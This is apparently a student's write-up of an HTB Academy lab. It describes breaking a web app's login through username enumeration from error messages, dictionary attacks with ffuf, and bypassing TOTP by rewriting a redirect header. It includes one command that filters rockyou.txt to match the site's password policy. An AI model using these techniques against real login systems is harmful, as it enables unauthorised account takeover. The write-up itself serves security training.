HTB Academy - Broken Auth Lab Assessment
Task: Perform security assessment on the web application and bypass authentication to get the flag
Login page: Identify error generated by application for invalid credentials - 1
I do not have any information of any valid user. So, it is not distinguishable whether the error generated is due to incorrect username or password. So, moving forward to register page...
Register page: Register a new test user
While registering, I got password policy rules that has been implemented into the application. This will be helpful in further attacks.
Login Page: Identifying the errors generated by invalid credentials - 2
As I have a valid credential now, I can determine errors generated by invalid username and password.
For valid username and invalid credential, I got a new error "Invalid credentials." and for invalid username, he error is "Unknown username or password." as found earlier. With these information in hand, I can now find valid username.
Username Enumeration
With the ffuf tool I brute-forced the login page to find valid username. I got a hit, that is a valid username, while ffuf generated other usernames too, but those are false positive results, the size is 0 and I also cross-checked manually. Next, I need to find a valid password for the user.
Password Attack (Dictionary Attack)
Before starting the attack, I need a wordlist, I used rockyou.txt with optimization based on the password policy.
Command used to optimize the wordlist: grep -E '^.{12}$' /usr/share/wordlists/rockyou.txt | grep -E '[0-9]' | grep -E '[a-z]' | grep -E '[A-Z]' | grep -Ev '[~!@#$%&*]' > passwords.txt
Brute-Forcing the Password with ffuf
I got a hit. Now, I have both username and password required to authenticate into the web application. After login there is another layer of authentication waiting for me, that is TOTP (Time-based One Time Password).
2FA Bypass - TOTP
There is a possible brute-force attack, but I have no idea how many digits it has. So, I tried with 4-digit and then with 6-digit, I stopped as it was not feasible, as 6-digit OTP brute-force is a huge number.
I analyzed the requests and then found out that after 3 requests in the 2fa endpoint, it redirects to login page. So, there is a possibility that I can manipulate the redirection and redirect it to the page that will open after successful authentication.
I intercepted the response of 3rd request and changed the Location header to profile.php:
The redirection was successfull and I was authenticated into the web app and retrived the flag.
Last updated